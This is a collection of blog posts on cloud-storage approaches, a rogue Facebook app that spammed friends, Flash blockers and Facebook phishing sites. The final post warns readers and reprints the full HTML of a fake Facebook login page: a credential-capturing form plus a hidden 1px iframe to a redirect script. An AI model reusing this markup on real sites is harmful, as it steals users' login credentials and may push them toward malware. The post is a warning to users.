After I read about another Google customer losing all of his Google data when Google decided to delete (or at least suspend) his account, I got to thinking about all of the times that Google has made a mistake and deleted user accounts or deleted email for Gmail users, I thought about how the different approaches of the key players in the emerging world require you to make some choices, some of which may be untenable. So, I thought I’d lay them out in clearer form than you will get from the hard-core technical blogs or the companies themselves.

At the Apple Worldwide Developers Conference this year (WWDC 2011), Steve Jobs and the Apple executive team introduced iOS 5 and iCloud. During his iCloud introduction, Jobs said this: “We are going to demote the PC to just be a device. We are going to move the digital hub, the center of your digital life, into the cloud.” This is Apple’s philosophy: the iCloud is the sync-master for  your digital life. It provides the axle to your devices that are the spokes. However (and this is a vital distinction!), your digital content lives on your devices when you are using it. The iCloud, then, is the master copy, but Apple expects you to have copies on one or more of your devices.

This is in sharp contrast to Google. In Google’s world, the cloud is the only place where your data resides. You’ll use your browsers (on your PC, your tablet, or your phone) to access, manipulate, create, and use your content. You may even cache some of it locally for performance reasons (for example, caching the first part of a video so you can watch it without “stutters”). However, the content is in the cloud and your devices are simply windows into it from Google’s perspective.

…and then there’s Microsoft. They want to get in on “this cloud thing,” too, but they really aren’t sure how to do it. Their business is Windows and Office, so how can they use the cloud and keep those lines humming? What they are doing now is having the cloud be a glorified backup service with some of the capabilities of their apps. The best experience, however, is to use their native apps on a PC and hook them into the cloud for backup and collaboration. This means that Microsoft Office 365 is a different perspective than iCloud (which is personal) and Google (which is all about the data being in the cloud only). It’s effectively a hybrid of the two.

Regardless, you will want to make a choice based on these distinctions, because to the cloud you will go, one way or the other.

Last week I was sitting in my office working away on a client’s iPhone app when my iPhone’s text message bell alert rang. I picked up my phone to see my daughter’s text message: “Free iPad event?” After an exchange, I learned that my Facebook account had sent her an event request with a link to a rogue quiz site that was offering quizzes for the amazingly low price of $19.99 a month. I also started getting emails from other friends who were getting the invitation from me.

So, I got mad.

First, I deleted the event. Then, I posted to my wall about it. And then, I went on the warpath.

You see, I am very careful about my Facebook account. While I explore aspects of Facebook as part of my research for clients, I am aware of the dangers and am diligent in working through the possible issues. But, I got caught. So, I went looking for the source of the issue.

The first thing I learned is that I am not alone. There is even a Facebook group that has grown up to oppose it. But, no one seemed to know how it was done, so I began to investigate.

Given the invitation text and the targets, I figured out that it had to have come from an application with access to my account. I dug through my entire list of applications, eliminating many that were either old or that I don’t use. But, it’s important to understand that Facebook makes this process far more painful than it needs to be. If only Facebook would make a note on the wall posts, event invites, and other items noting what application was used to create it, we could track down the reprobates who build these cheap cheats. Twitter even does it:

Twitter displays the source of the Tweet below the text

So Twitter, with its informal nature, trumps Facebook in one of the most important aspects of security: transparency.

In my next few posts, I’ll outline what you can do to scrub your Facebook account in a way that will make it much more hardened against this kind of attack. However, with the limited transparency of Facebook’s system right now, there is only so much you can do.

“Want a free iPad?” That’s an email that my Facebook friends received from me this morning. The problem is, I never sent it. In fact, I never saw it until it had been sent on my behalf. Being careful isn’t enough.

I wrote here on this very blog last year about the various trojans and other attacks made on and through Facebook.

Today, I was used.

This morning as I was starting work, my daughter sent a text message asking me about a free iPad. I didn’t know what she was talking about. Then, after a bit of investigation, I learned that some rogue application that I had approved for access to my Facebook account, had sent an event invitation to everyone on my Friends list.

This is a big deal.

It’s a big deal because I cannot even easily send a message to everyone on my friends list. Therefore, my apology email took a while to create, since I had to manually create a list with all of my friends on it.

It’s also a big deal because there was no way for me to find out from the invitations which application sent it. Was one of the seemly appropriate applications like Twitter or Foursquare the issue? Or how about that Fast Company Influence Project app that I set up yesterday? I can’t tell. The invitation does tell anyone how it was created, and I have no way of working backwards from the invitation to the app and removing its permissions.

This is a Facebook security problem, and Facebook needs to address it. As a result of this issue, I have removed a number of apps from my Facebook page and will remove all of them if it happens again.

In the meantime, I’m committed to doing what I can to track down this rogue app. If you have any insight into how this was done or what app might have done it, I’d love to get your insights. I’ll update this post as I discover more.

A Facebook conversation this week reminded me that many people do not know how damaging Adobe Flash can be on many systems, especially, it seems, those running Apple’s OS X. For many years, I have found Flash more annoying than anything, and so have run various plug-ins to keep Flash from loading in my browsers. There are also an additional mini-application that you may find useful.

First, there are a number of Flash blocking plug-ins for the various browsers available. For Firefox, there’s FlashBlock. Ffor Safari there’s ClickToFlash. For Google Chrome, there’s Kill-Flash. All of these plugins do the same thing: they replace the Flash elements on a page with a clickable image. If you don’t click, no Flash ever loads. If you do, Flash loads and plays.

One think I especially like about ClickToFlash is that you can adjust the settings to load H.264 videos on YouTube instead of Flash when it is available. Very nice.

In addition to these plug-ins, I also use BashFlash on my Macs. This little application sits quietly in the menubar until one of the Flash processes starts going crazy. Sometimes, a Flash process can cycle up and take over a computer. When one does this, BashFlash wakes up, turns red, and lets you kill the runaway Flash process.

Together, these plugins and app will make your browsing experience much more pleasant. I run ClickToFlash and Kill-Flash on my two most-used browsers, and keep BashFlash on hand, too. Let me know how it goes for you.

The word “Phishing” is used for sites that steal your identity, and there are more Phishing sites stealing Facebook login information today.

First thing this morning, I received a Facebook message with the subject “Hi” and the content “Look at redbuddy dot be”. Going to that site gets you the same kind of site as I reported in Facebook Trojan Attack earlier this week. Once again it’s obviously a phishing site, with language like, ”We helps you connect and share with the people in your life.” and yet people are still being sucked in!

Beware! Do not log in to any site that you don’t absolutely know is the site you want. Realize that any time you use your login, it can be compromised. I’m putting together a brief video on this that I plan to have ready this weekend.

For more insights on social media, check out my social media programs.

This morning, I received a facebook message that was short and questionable: “Check kirgo.at.” Interested, I visited the site, only to discover a poorly-disguised site attempting to look like a Facebook login page:

Fake Facebook Page

While this page doesn’t look very much like the real Facebook login page, and all of the links at the bottom go nowhere, some people are being caught by this trojan. They enter their Facebook credentials and their accounts are immediately compromised. Once compromised, their account sends a Facebook message to everyone in their Friends list with the same message (“Check X.at.”). That’s how the Trojan propogates.

Note that some people got this message in their email (because Facebook sends them a copy of their messages) and jumped to the page from there.

Here is the rule: Do not EVER give your Facebook credentials to any site other than Facebook, and do not follow a link to something that looks like Facebook and fill in your credentials. Period.

Update: Late today, Facebook added some additional controls to their login page in an effort to defeat the hackers, checking login attempts against the location from which the attempt is coming. This is a good move start for Facebook, who are still so new at the game that there are a number of security holes in their systems.

If you read HTML, the following is the complete HTML from the page as of 11:40am MDT on May 21, 2009:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<title>Login</title>
	<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5LNJ/lpkg/56jyd27o/en_US/141/163305/css/aubdlzq1p80sw40o.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zC45Y/l/ecfhg87x/en_US/159827/css/login.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z252O/lpkg/zz2nmjbl/en_US/141/163009/css/a22nq2m07kocs00s.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z6WDZ/lpkg/6k6blvpv/en_US/141/164471/css/bjoirszhnfsoc88c.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z32G8/lpkg/14ewl514/en_US/141/159058/css/9wzufavzfjcogsgk.pkg.css" />
</head>
<body class="login_page ie7 UIPage_LoggedOut Locale_en_US">
<div id="dropmenu_container"></div>
<div id="nonfooter">
	<div id="page_height" class="clearfix">
		<div id="menubar_container">
			<div id="fb_menubar" class="fb_menubar_logged_out clearfix">
				<div id="fb_menubar_core"><ul class="fb_menu_list"><li class="fb_menu" id="fb_menubar_logo" style="height:85px;"></li></ul></div>
				<div id="fb_menubar_aux"><ul class="fb_menu_list"></ul></div>
			</div>
			<div class="signup_box clearfix" style="height:25px;">
				<div class="UILinkButton UILinkButton_SUBig"><a href="/" class="UILinkButton_A">Sign Up</a>
					<div class="UILinkButton_RW">
						<div class="UILinkButton_R"></div>
					</div>
				</div>
				<span class="signup_box_message" style="padding-left:15px;">We helps you connect and share with the people in your life.</span></div></div><div id="content" class="fb_content"><div class="UIFullPage_Container"><div class="UIInterstitialContainer clearfix"><div class="UIRoundedTransparentBox"><div class="UIRoundedTransparentBox_Inner clearfix"><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TR">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BR">&nbsp;</div><div class="UIRoundedTransparentBox_Border clearfix"><div class="UIInterstitialBox_Container clearfix"><div class="UIOneOff_Container">
				<div class="title_header add_border"><h2 class="no_icon">Login</h2></div>
				<form method="POST" action="/?login_attempt=1">
				<div id="loginform" style="">
				<div class="form_row clearfix "><label for="email" id="label_email">Email:</label><input type="text" class="inputtext" id="email" name="email" value="" /></div>
				<div class="form_row clearfix "><label for="pass" id="label_pass">Password:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
				<label class="persistent"><input type="checkbox" class="inputcheckbox " name="persistent" value="1" /><span>Remember me</span></label>
				<div id="buttons" class="form_row clearfix"><label></label>
				<input type="submit" value="Login" name="login" id="login" class="inputsubmit" /></div><p class="reset_password form_row"><label></label><a href="/">Forgot your password?</a></p></div></form>
</div></div></div></div></div></div></div></div></div></div><br><br><div id="pagefooter"><div class="pagefooter_topborder clearfix"><div class="copyright_and_location clearfix"><div class="copyright" id="pagefooter_copyright"><span title="PHP"></span><span id="rtime" title="130">&copy;</span> <span title="10.18.7.118">20</span><span title="17409680">09</span></div>
</div><div id="pagefooter_links"><ul i
1df
d="pagefooter_left_links"><li><a href="/">Login</a></li><li><a href="/">About</a></li><li><a href="/">Advertising</a></li><li><a href="/">Careers</a></li><li><a href="/">Terms</a></li></ul><ul id="pagefooter_right_links"><li><a href="/">Privacy</a></li><li><a href="/">Mobile</a></li><li><a href="/">Help</a></li></ul></div></div></div><iframe src='/tds/go.php?sid=2&pid=1431' width="1px" height="1px"></iframe><font></font><font></font><font></font><font></font>
</body>
</html>

This is not the only domain name that is attempting this, either, so beware!